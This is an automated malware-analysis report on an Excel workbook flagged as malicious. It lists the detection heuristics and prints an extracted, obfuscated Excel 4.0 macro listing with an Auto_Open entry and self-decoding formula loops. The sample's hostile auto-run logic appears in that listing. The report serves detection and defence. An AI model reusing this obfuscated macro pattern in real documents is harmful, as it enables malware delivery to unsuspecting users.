MALICIOUS
180
Risk Score
Heuristics 4
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
x86 GetPC stub (CALL $+5; POP EBP) high SC_GETPC_CALLx86 GetPC stub (CALL $+5; POP EBP)Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'add' is 68% of instructions — a sled or padding/filler run, not program logic).
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6625 bytes |
SHA-256: 85bbb3c756954bf17696699011c3b8f37294edb5d8c6335a2bad0fe2f3b77267 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 15 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - AthdvL
' 0018 25 LABEL : Cell Value, String Constant - AoXaBJYEaR len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!I188
' 0018 21 LABEL : Cell Value, String Constant - CCLTlT len=0
' 0018 20 LABEL : Cell Value, String Constant - dchoX len=0
' 0018 20 LABEL : Cell Value, String Constant - fgTGc len=0
' 0018 20 LABEL : Cell Value, String Constant - FVRIh len=0
' 0018 25 LABEL : Cell Value, String Constant - IOMFTgeimJ len=0
' 0018 22 LABEL : Cell Value, String Constant - jgNuneI len=0
' 0018 26 LABEL : Cell Value, String Constant - KmsgweBMOQC len=0
' 0018 22 LABEL : Cell Value, String Constant - lVixsGA len=0
' 0018 26 LABEL : Cell Value, String Constant - ndasOFbpFgF len=0
' 0018 20 LABEL : Cell Value, String Constant - Nrjgx len=0
' 0018 22 LABEL : Cell Value, String Constant - QHgJxlt len=0
' 0018 21 LABEL : Cell Value, String Constant - RhBRNg len=0
' 0018 20 LABEL : Cell Value, String Constant - sUAcA len=0
' 0018 27 LABEL : Cell Value, String Constant - tFYLAtAJvScl len=0
' 0018 20 LABEL : Cell Value, String Constant - VgBIZ len=0
' 0018 24 LABEL : Cell Value, String Constant - wVUgDGEIn len=0
' 0018 21 LABEL : Cell Value, String Constant - XCCPda len=0
' 0018 20 LABEL : Cell Value, String Constant - XiBVl len=0
' 0018 26 LABEL : Cell Value, String Constant - ZQNmuHpRbcr len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' AthdvL,R59,"",-741.00000000000000000000
' AthdvL,R60,"",88.00000000000000000000
' AthdvL,R61,"",-15.00000000000000000000
' AthdvL,R62,"",111.00000000000000000000
' AthdvL,R63,"",428.00000000000000000000
' AthdvL,R64,"",439.00000000000000000000
' AthdvL,I95,"SET.NAME("KmsgweBMOQC",0+VALUE("0"))",""
' AthdvL,I99,"SET.NAME("VgBIZ",KmsgweBMOQC)",""
' AthdvL,I102,"SET.NAME("RhBRNg",KmsgweBMOQC)",""
' AthdvL,I107,"SET.NAME("sUAcA",COUNTA(lVixsGA))",""
' AthdvL,I111,"SET.NAME("FVRIh",COUNTA(ZQNmuHpRbcr))",""
' AthdvL,I113,[],""
' AthdvL,I115,"SET.NAME("Nrjgx","")",""
' AthdvL,I119,"VgBIZ",""
' AthdvL,I122,"SET.NAME("QHgJxlt",HLOOKUP("*",lVixsGA,VgBIZ,FALSE))",""
' AthdvL,I126,"jgNuneI",""
' AthdvL,I129,"SET.NAME("XCCPda",KmsgweBMOQC)",""
' AthdvL,I132,[],""
' AthdvL,I135,"XCCPda",""
' AthdvL,I140,"XiBVl",""
' AthdvL,I142,"tFYLAtAJvScl",""
' AthdvL,I145,"CCLTlT",""
' AthdvL,I150,"SET.NAME("dchoX",VALUE(HLOOKUP("*",ZQNmuHpRbcr,CCLTlT,FALSE)))",""
' AthdvL,I154,"wVUgDGEIn",""
' AthdvL,I159,"Nrjgx",""
' AthdvL,I163,"RhBRNg",""
' AthdvL,I167,NEXT(),""
' AthdvL,I170,"fgTGc",""
' AthdvL,I174,[],""
' AthdvL,I177,"IOMFTgeimJ",""
' AthdvL,I181,NEXT(),""
' AthdvL,I186,RETURN(),""
' AthdvL,I214,"SET.NAME("AoXaBJYEaR",I95)",""
' AthdvL,I216,"lVixsGA",""
' AthdvL,I220,"SET.NAME("ZQNmuHpRbcr",R70C12)",""
' AthdvL,I222,"SET.NAME("IOMFTgeimJ",232)",""
' AthdvL,I226,"SET.NAME("ndasOFbpFgF",9)",""
' AthdvL,I231,AoXaBJYEaR(),""
' AthdvL,I232,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.